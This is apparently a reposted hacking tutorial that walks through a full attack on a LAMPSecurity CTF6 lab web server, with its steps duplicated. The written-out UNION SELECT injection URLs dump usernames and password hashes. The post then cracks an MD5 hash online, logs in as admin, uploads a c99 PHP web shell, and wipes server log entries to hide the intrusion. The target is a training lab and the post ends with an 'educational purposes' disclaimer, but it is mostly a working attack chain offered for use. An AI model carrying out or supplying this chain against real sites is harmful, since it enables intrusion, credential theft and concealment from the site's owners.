Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: Hackerlaxu1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucTRb-8QitQjBBOjxgTvCBQQ0y4AyFRSqImnHOpAOpEJmuKzDbzMvwtijk04QVpDubdDQXLLUDucVl9HWhPzWNPEMV5YJcXWmgFxQbSO9qUBlPPhGIWO9odHbAv35WV3pNb3uTSMFqPbhV-F1R1UsSZSOXiJ7a5ufVYuroYNM9q3bm=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: Hackerlaxu2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sp4RVqBAmL9Tx5crZm6ucRMGvkMz8yutssUXfmr2fBhOFlU4aee6J_MhH6b6iv1tss058PxcgLEpQw2kMRUbHcf17slbNnuMv8spiQCPHLTbq1t1RfxK5k8HYg-Sa_BJ4CqsdyfJjrB-6owqgDrK_ULvDo561a5nno62xzm7iN32J2jA=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: Hackerlaxu3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_spXJDFtO6ArqTou2vRJL4fSA_L2xwY9jPo08h1eFeyZvYO1GOoGZ6psAn4V5051230n7M6upKEDox8PyhPSErOQD_i6I8_gKmtJVxlrG9L4ZXAHpQelJq-H0QpD3QqMVdCbWceWLFI6m58q9u_Sr6XdvT4fQOqNSVrcec6ZyLduuMNww=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: Hackerlaxu4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxeu14dqpGL1HVj5RM7JuAfjmeFCEFCpJztB7K4qqsC7fCvCbPzP8cwFFcldDJ5sQyxTECJpdjNxchbc1y5xLsTDoOUZvpvGzwrJF9tiiEZYTd1jqDQFaTKPYcphtPbjPyG-qMTX9FJPdP_xMONGOngSOR5wb4-ZRvgKrsQ59OKSLT1g=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: Hackerlaxu6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tJQ14ov8P-quQLKtBkcHejryoxJIXzyG1Hy-jChmXT3V-hPFng_kmmpDp4H3hLQjngmuXLD5PXgElpGlV20imw1aCuW_7Uwl7WA3fd-aHYTMlmabmGvwJ_0XUTEyqG2_NZrAqSdl5L6oEdPXb1TsZyk-R27Sm_dIApCqk3l9Rvex8ABQ=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: Hackerlaxu7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sLHoRXSaSrMu_naudumFju8QfIPMzGDfsVGz50VauHDQzCxdDcgYH2LEwAnXzj9MIAZFSYeI3F52XoSsFRWteLa1J3vJ-KwJs3qXLqze6cCakowgepPR46GIK7FL3ZGK9ouTSAUdhNF7cFfVT20LtA215AI_aRDJYphE9zlmloA8fm=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: Hackerlaxu12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5SzeexaA613KRVC1OqR7Btvrie1SfEraRE3-WTyIZn-SvTczYHwCJTb_LhECnRpjc8JgFlzULZK7rcYQnww7CDdeIsyfzGwOOFcV9fQ2en-THLcO2CFzHwLVXDWkr-4rqpaBuUkzP4bigsL4zKKMbO-HLgtTE-2MMJ-wNi5peUmkdSB0=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: Hackerlaxu13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_zzFA0VoTerlTlw-h4Av_Dlqv59943xr8kAJ86Uw0MVCgp3WuP2XHzDbOkXzB-QKmhpnVRCOY8l1IUkZRolRBf1opTA_q-QNEsCK-SrBNw-cwxyBR2bBlj3HD5LVnd6wjcHiR9OemdQwNCpGxjJgHfnjRH-IOrxJHAWfHY97NGsskmBg=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: Hackerlaxu14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5yE1FHT7OT78s0Qtg8uW_h2pOFviaW9SExR6-nGK6cyUbt5hKnc1QFCycAw478JvSBI5zxLgqC-69EvjkiF3EZn8rN0-K_CSHUANjeNr2x8lYfgV33ANCXu8KccledeNSbd0Bz2XakwOkItQJvuUdY-O25MuqaMwR_Nnt5odeOUs05bM=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: Hackerlaxu16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sV5FBbsWrEPley-O3SpvyMUlueS2rNShMjo3XW7jtoLIIWItoOPVbS21MhaFpWpC_kLyZXnRmEDFF081dkDaVSjhVunN9Bwv7uptE3nP2RyCAMVFEViIT0vkgq_lG68T_a3P9BDRzdYl_kznTkp4xCTg-pFi0ISk6WZ2cAkarP3KmUlEA=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: Hackerlaxu19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tGwRmIvpGle5rEOd1XrOG4_Igt4o8LkfbrF_4mbHE-_nqUzDSsoVWRzb1U9wbkSAmwsWxdBLGwwF0HHbZ8xlYfsbOIjBiaYJIKHFuE4RdPSfYkQAK0RHvEyYiVPvZFJ1aTFrw7vnATvf6HW2RxzDdjcLQoabbD6yCmKqjlwiKioMXwuA=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: Hackerlaxu21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ty5VrUexCz2LlaxEZwiP0y-EPX-_ip_Pukxv2-xvea98XXA1-N5Wfc9S0uiJvb_5F6Xcko-vcNfmWhyueqgPs2vuqOvHVa6Hz9uutXB9tJc-7HxMNRdeIgODVDQec4FhP0LZhEttMoeS_OZWrsZ_7U5w4lm2fbRo09Ow7YMq3GedoRZGk=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: Hackerlaxu22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_skGc4BlW2TYILgYsA_eAotKBQdgTas3sE-ducZK16wiGes_n1_GxKFauMzghmWdQCmayywb7GGR7MFe6K9qRyG0S_oqBSOK__XIeAlzX1tqPR1vvOQ_46QsOZWjf0eGfo8Td654wdUTdtPHc-aU5slNtRcx98nlIlRXBPkQWE0LDdcHGs=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: Hackerlaxu23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uT_xdBnjVWpDrOpy9H8RXDmPsdqDvUsGJZ2UqZdiY6DkEYXZOgj7m4XUSbmV7gm-DoN-vPlX_O1jw73Ntzg7Yyetm-oCFcg4vlMQMpPrj3QJ5SiZ-iFZZs8yS9y4zhRrZ2B6dedNP6gGxIvl40wJm3a8dt5GdEMzUKz_xb8t7OqiWcFw=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: Hackerlaxu24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_utnOJhEMWv10kim7mCNjEz6TQwnyYKKMHdUv-ifpNwOi41IYX_Oh46ilZ-wkqjD0TnDBBDgTL7EBRy0NgXrpazLZ5wHiMe3qGguqXEPr0C46qg930XzxfPfNbUQN7My0lehDlJBkgMPzaY6laETtn1vmWoq1NCOSoLvaFFEDkl-hw_iQ=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: Hackerlaxu25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uruj0vPv7DGTDMzgGNmfxbh3L8JNBGhJI3GReYtFYX4R6hXHFLBqKDOZ5Upr6axwjkjiNx4sgh47t1nFOvVfwGLcvObqExGX4psk-zGDnHXgHDqRwRjB5fv-g2PNxtbtAFksszLlrlEUFIMn3ndC40oXISduKNvxXImY_6OgjiYfXkzLY=s0-d)
Step 17:
Lets find the user name
![[Image: Hackerlaxu27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toVcG-SnTwkH72ezoP7RcjRq8CgwdQjYe0qHHLijuEP5qFuD8l0GTy2Nj3rmr4FBSSKgE_6S4CQOnZWbfMRP00CWPIIs2dq4R4yRLyTRxDMxbsk58TdX2Ohj1ROYiiXToDiuLZDb_qmYKkUqkAXFAU0shV4xWmApILI_HnSeXiqUQ-mM4=s0-d)
Step 18:
Now, what about password
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
Code:
http://192.168.132.128/Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
Code:
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
Code:
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
Code:
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
Reference:
1. Infond tutorial
Happy Hacking.!!!
======================================================================
Note: This tutorial is only for
Educational Purposes, I did not take any responsibility of any misuse,
you will be solely responsible for any misuse that you do. Scanning
Server & Web Hacking is criminal activity and is punishable under
cyber crime and you may get upto 40 years of imprisonment, if got
caught in doing so.
